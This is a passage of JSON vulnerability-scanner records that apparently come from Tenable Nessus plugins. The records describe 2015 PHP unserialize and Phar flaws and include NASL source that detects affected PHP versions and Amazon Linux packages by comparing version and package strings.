\"^5\\.6\\.([0-9]|1[0-2])($|[^0-9])\")\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : '+source +\n '\\n Installed version : '+version +\n '\\n Fixed version : 5.6.13' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T15:58:18", "description": "According to its banner, the version of PHP running on the remote web server is 5.6.x prior to 5.6.13. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple use-after-free memory errors exist related to the unserialize() function, which a remote attacker can exploit to execute arbitrary code. (CVE-2015-6834)\n\n - A use-after-free memory error exists related to the php_var_unserialize() function. A remote attacker, using a crafted serialize string, can exploit this to execute arbitrary code. (CVE-2015-6835)\n\n - A type confusion error exists related to the serialize_function_call() function due to improper validation of the headers field, which a remote attacker can exploit to have unspecified impact. (CVE-2015-6836)\n\n - A flaw exists in the XSLTProcessor class due to improper validation of input from the libxslt library, which a remote attacker can exploit to have an unspecified impact. (CVE-2015-6837, CVE-2015-6838)\n\n - A flaw exists in the php_zip_extract_file() function in file php_zip.c due to improper sanitization of user-supplied input. An unauthenticated, remote attacker can exploit this to create arbitrary directories outside of the restricted path.\n\n - A NULL pointer dereference flaw exists in the spl_autoload() function in file php_spl.c due to improper sanitization of user-supplied input. An unauthenticated, remote attacker can exploit this to cause a PHP application to crash.\n\n - A flaw exists in the parse_ini_file() and parse_ini_string() functions due to improper sanitization of user-supplied input. An unauthenticated, remote attacker can exploit this to cause a PHP application to crash.\n\n - A flaw exists in the CLI SAPI Web Server due to improper sanitization of user-supplied input. An unauthenticated, remote attacker can exploit this to access arbitrary files outside of the restricted path.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-01-09T00:00:00", "type": "nessus", "title": "PHP 5.6.x < 5.6.13 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-9767", "CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:php:php:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98805", "href": "https://www.tenable.com/plugins/was/98805", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:05:00", "description": "According to its banner, the version of PHP running on the remote web server is 5.4.x prior to 5.4.45. It is, therefore, affected by the following vulnerabilities :\n\n - A directory traversal vulnerability in the ZipArchive::extractTo function in ext/zip/php_zip.c could allow a remote attacker to create arbitrary empty directories via a crafted ZIP archive.\n (CVE-2014-9767)\n\n - Multiple use-after-free memory errors exist related to the unserialize() function. A remote attacker can exploit these errors to execute arbitrary code.\n (CVE-2015-6834)\n\n - A use-after-free memory error exists related to the php_var_unserialize() function. A remote attacker, using a crafted serialize string, can exploit this to execute arbitrary code. (CVE-2015-6835)\n\n - A type confusion error exists related to the serialize_function_call() function due to improper validation of the headers field. A remote attacker can exploit this to have unspecified impact. (CVE-2015-6836)\n\n - Multiple flaws exist in the XSLTProcessor class due to improper validation of input from the libxslt library. A remote attacker can exploit thse flaws to have an unspecified impact. (CVE-2015-6837, CVE-2015-6838)\n\n - A flaw exists in the php_zip_extract_file() function in file php_zip.c due to improper sanitization of user-supplied input. An unauthenticated, remote attacker can exploit this to create arbitrary directories outside of the restricted path.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2015-09-10T00:00:00", "type": "nessus", "title": "PHP 5.4.x < 5.4.45 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-9767", "CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_5_4_45.NASL", "href": "https://www.tenable.com/plugins/nessus/85885", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85885);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2014-9767\",\n \"CVE-2015-6834\",\n \"CVE-2015-6835\",\n \"CVE-2015-6836\",\n \"CVE-2015-6837\",\n \"CVE-2015-6838\"\n );\n script_bugtraq_id(\n 76644,\n 76649,\n 76652,\n 76733,\n 76734,\n 76738\n );\n\n script_name(english:\"PHP 5.4.x < 5.4.45 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP running on the remote web\nserver is 5.4.x prior to 5.4.45. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - A directory traversal vulnerability in the\n ZipArchive::extractTo function in ext/zip/php_zip.c\n could allow a remote attacker to create arbitrary\n empty directories via a crafted ZIP archive.\n (CVE-2014-9767)\n\n - Multiple use-after-free memory errors exist related to\n the unserialize() function. A remote attacker can\n exploit these errors to execute arbitrary code.\n (CVE-2015-6834)\n\n - A use-after-free memory error exists related to the\n php_var_unserialize() function. A remote attacker, using\n a crafted serialize string, can exploit this to execute\n arbitrary code. (CVE-2015-6835)\n\n - A type confusion error exists related to the\n serialize_function_call() function due to improper\n validation of the headers field. A remote attacker can\n exploit this to have unspecified impact. (CVE-2015-6836)\n\n - Multiple flaws exist in the XSLTProcessor class due to\n improper validation of input from the libxslt library. A\n remote attacker can exploit thse flaws to have an\n unspecified impact. (CVE-2015-6837, CVE-2015-6838)\n\n - A flaw exists in the php_zip_extract_file() function\n in file php_zip.c due to improper sanitization of\n user-supplied input. An unauthenticated, remote attacker\n can exploit this to create arbitrary directories outside\n of the restricted path.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://php.net/ChangeLog-5.php#5.4.45\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 5.4.45 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-6836\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported) audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\n# Check that it is the correct version of PHP\nif (version =~ \"^5(\\.4)?$\") audit(AUDIT_VER_NOT_GRANULAR, \"PHP\", port, version);\nif (version !~ \"^5\\.4\\.\") audit(AUDIT_NOT_DETECT, \"PHP version 5.4.x\", port);\n\nif (version =~ \"^5\\.4\\.([0-9]|[1-3][0-9]|4[0-4])($|[^0-9])\")\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 5.4.45' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T01:35:53", "description": "As reported upstream, A NULL pointer dereference flaw was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash. (CVE-2015-7803 )\n\nA flaw was discovered in the way PHP performed object unserialization.\nSpecially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.\n(CVE-2015-6834 , CVE-2015-6835 , CVE-2015-6836)\n\nA NULL pointer dereference flaw was found in the XSLTProcessor class in PHP. An attacker could use this flaw to cause a PHP application to crash if it performed Extensible Stylesheet Language (XSL) transformations using untrusted XSLT files and allowed the use of PHP functions to be used as XSLT functions within XSL stylesheets.\n(CVE-2015-6837 , CVE-2015-6838)\n\nAs reported upstream, an uninitialized pointer use flaw was found in the phar_make_dirstream() function of PHP's Phar extension. A specially crafted phar file in the ZIP format with a directory entry with a file name '/ZIP' could cause a PHP application function to crash. (CVE-2015-7804)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-10-22T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : php55 (ALAS-2015-602)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838", "CVE-2015-7803", "CVE-2015-7804"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:php55", "p-cpe:/a:amazon:linux:php55-bcmath", "p-cpe:/a:amazon:linux:php55-cli", "p-cpe:/a:amazon:linux:php55-common", "p-cpe:/a:amazon:linux:php55-dba", "p-cpe:/a:amazon:linux:php55-debuginfo", "p-cpe:/a:amazon:linux:php55-devel", "p-cpe:/a:amazon:linux:php55-embedded", "p-cpe:/a:amazon:linux:php55-enchant", "p-cpe:/a:amazon:linux:php55-fpm", "p-cpe:/a:amazon:linux:php55-gd", "p-cpe:/a:amazon:linux:php55-gmp", "p-cpe:/a:amazon:linux:php55-imap", "p-cpe:/a:amazon:linux:php55-intl", "p-cpe:/a:amazon:linux:php55-ldap", "p-cpe:/a:amazon:linux:php55-mbstring", "p-cpe:/a:amazon:linux:php55-mcrypt", "p-cpe:/a:amazon:linux:php55-mssql", "p-cpe:/a:amazon:linux:php55-mysqlnd", "p-cpe:/a:amazon:linux:php55-odbc", "p-cpe:/a:amazon:linux:php55-opcache", "p-cpe:/a:amazon:linux:php55-pdo", "p-cpe:/a:amazon:linux:php55-pgsql", "p-cpe:/a:amazon:linux:php55-process", "p-cpe:/a:amazon:linux:php55-pspell", "p-cpe:/a:amazon:linux:php55-recode", "p-cpe:/a:amazon:linux:php55-snmp", "p-cpe:/a:amazon:linux:php55-soap", "p-cpe:/a:amazon:linux:php55-tidy", "p-cpe:/a:amazon:linux:php55-xml", "p-cpe:/a:amazon:linux:php55-xmlrpc", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2015-602.NASL", "href": "https://www.tenable.com/plugins/nessus/86496", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2015-602.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86496);\n script_version(\"2.6\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-6838\", \"CVE-2015-7803\", \"CVE-2015-7804\");\n script_xref(name:\"ALAS\", value:\"2015-602\");\n\n script_name(english:\"Amazon Linux AMI : php55 (ALAS-2015-602)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"As reported upstream, A NULL pointer dereference flaw was found in the\nway PHP's Phar extension parsed Phar archives. A specially crafted\narchive could cause PHP to crash. (CVE-2015-7803 )\n\nA flaw was discovered in the way PHP performed object unserialization.\nSpecially crafted input processed by the unserialize() function could\ncause a PHP application to crash or, possibly, execute arbitrary code.\n(CVE-2015-6834 , CVE-2015-6835 , CVE-2015-6836)\n\nA NULL pointer dereference flaw was found in the XSLTProcessor class\nin PHP. An attacker could use this flaw to cause a PHP application to\ncrash if it performed Extensible Stylesheet Language (XSL)\ntransformations using untrusted XSLT files and allowed the use of PHP\nfunctions to be used as XSLT functions within XSL stylesheets.\n(CVE-2015-6837 , CVE-2015-6838)\n\nAs reported upstream, an uninitialized pointer use flaw was found in\nthe phar_make_dirstream() function of PHP's Phar extension. A\nspecially crafted phar file in the ZIP format with a directory entry\nwith a file name '/ZIP' could cause a PHP application function to\ncrash. (CVE-2015-7804)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.php.net/bug.php?id=69720\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.php.net/bug.php?id=70433\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2015-602.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update php55' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-mysqlnd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-opcache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/10/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"php55-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-bcmath-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-cli-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-common-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-dba-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-debuginfo-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-devel-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-embedded-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-enchant-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-fpm-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-gd-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-gmp-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-imap-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-intl-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-ldap-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-mbstring-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-mcrypt-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-mssql-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-mysqlnd-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-odbc-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-opcache-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-pdo-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-pgsql-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-process-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-pspell-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-recode-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-snmp-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-soap-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-tidy-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-xml-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-xmlrpc-5.5.30-1.110.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php55 / php55-bcmath / php55-cli / php55-common / php55-dba / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T01:35:53", "description": "As reported upstream, A NULL pointer dereference flaw was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash. (CVE-2015-7803 )\n\nA flaw was discovered in the way PHP performed object unserialization.\nSpecially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.\n(CVE-2015-6834 , CVE-2015-6835 , CVE-2015-6836)\n\nA NULL pointer dereference flaw was found in the XSLTProcessor class in PHP. An attacker could use this flaw to cause a PHP application to crash if it performed Extensible Stylesheet Language (XSL) transformations using untrusted XSLT files and allowed the use of PHP functions to be used as XSLT functions within XSL stylesheets.\n(CVE-2015-6837 , CVE-2015-6838)\n\nAs reported upstream, an uninitialized pointer use flaw was found in the phar_make_dirstream() function of PHP's Phar extension. A specially crafted phar file in the ZIP format with a directory entry with a file name '/ZIP' could cause a PHP application function to crash. (CVE-2015-7804)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-10-22T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : php56 (ALAS-2015-601)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838", "CVE-2015-7803", "CVE-2015-7804"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:php56", "p-cpe:/a:amazon:linux:php56-bcmath", "p-cpe:/a:amazon:linux:php56-cli", "p-cpe:/a:amazon:linux:php56-common", "p-cpe:/a:amazon:linux:php56-dba", "p-cpe:/a:amazon:linux:php56-dbg", "p-cpe:/a:amazon:linux:php56-debuginfo", "p-cpe:/a:amazon:linux:php56-devel", "p-cpe:/a:amazon:linux:php56-embedded", "p-cpe:/a:amazon:linux:php56-enchant", "p-cpe:/a:amazon:linux:php56-fpm", "p-cpe:/a:amazon:linux:php56-gd", "p-cpe:/a:amazon:linux:php56-gmp", "p-cpe:/a:amazon:linux:php56-imap", "p-cpe:/a:amazon:linux:php56-intl", "p-cpe:/a:amazon:linux:php56-ldap", "p-cpe:/a:amazon:linux:php56-mbstring", "p-cpe:/a:amazon:linux:php56-mcrypt", "p-cpe:/a:amazon:linux:php56-mssql", "p-cpe:/a:amazon:linux:php56-mysqlnd", "p-cpe:/a:amazon:linux:php56-odbc", "p-cpe:/a:amazon:linux:php56-opcache", "p-cpe:/a:amazon:linux:php56-pdo", "p-cpe:/a:amazon:linux:php56-pgsql", "p-cpe:/a:amazon:linux:php56-process", "p-cpe:/a:amazon:linux:php56-pspell", "p-cpe:/a:amazon:linux:php56-recode", "p-cpe:/a:amazon:linux:php56-snmp", "p-cpe:/a:amazon:linux:php56-soap", "p-cpe:/a:amazon:linux:php56-tidy", "p-cpe:/a:amazon:linux:php56-xml", "p-cpe:/a:amazon:linux:php56-xmlrpc", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2015-601.NASL", "href": "https://www.tenable.com/plugins/nessus/86495", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2015-601.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86495);\n script_version(\"2.6\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-6838\", \"CVE-2015-7803\", \"CVE-2015-7804\");\n script_xref(name:\"ALAS\", value:\"2015-601\");\n\n script_name(english:\"Amazon Linux AMI : php56 (ALAS-2015-601)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"As reported upstream, A NULL pointer dereference flaw was found in the\nway PHP's Phar extension parsed Phar archives. A specially crafted\narchive could cause PHP to crash. (CVE-2015-7803 )\n\nA flaw was discovered in the way PHP performed object unserialization.\nSpecially crafted input processed by the unserialize() function could\ncause a PHP application to crash or, possibly, execute arbitrary code.\n(CVE-2015-6834 , CVE-2015-6835 , CVE-2015-6836)\n\nA NULL pointer dereference flaw was found in the XSLTProcessor class\nin PHP. An attacker could use this flaw to cause a PHP application to\ncrash if it performed Extensible Stylesheet Language (XSL)\ntransformations using untrusted XSLT files and allowed the use of PHP\nfunctions to be used as XSLT functions within XSL stylesheets.\n(CVE-2015-6837 , CVE-2015-6838)\n\nAs reported upstream, an uninitialized pointer use flaw was found in\nthe phar_make_dirstream() function of PHP's Phar extension. A\nspecially crafted phar file in the ZIP format with a directory entry\nwith a file name '/ZIP' could cause a PHP application function to\ncrash. (CVE-2015-7804)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.php.net/bug.php?id=69720\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.php.net/bug.php?id=70433\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2015-601.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update php56' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-enchant\");\n 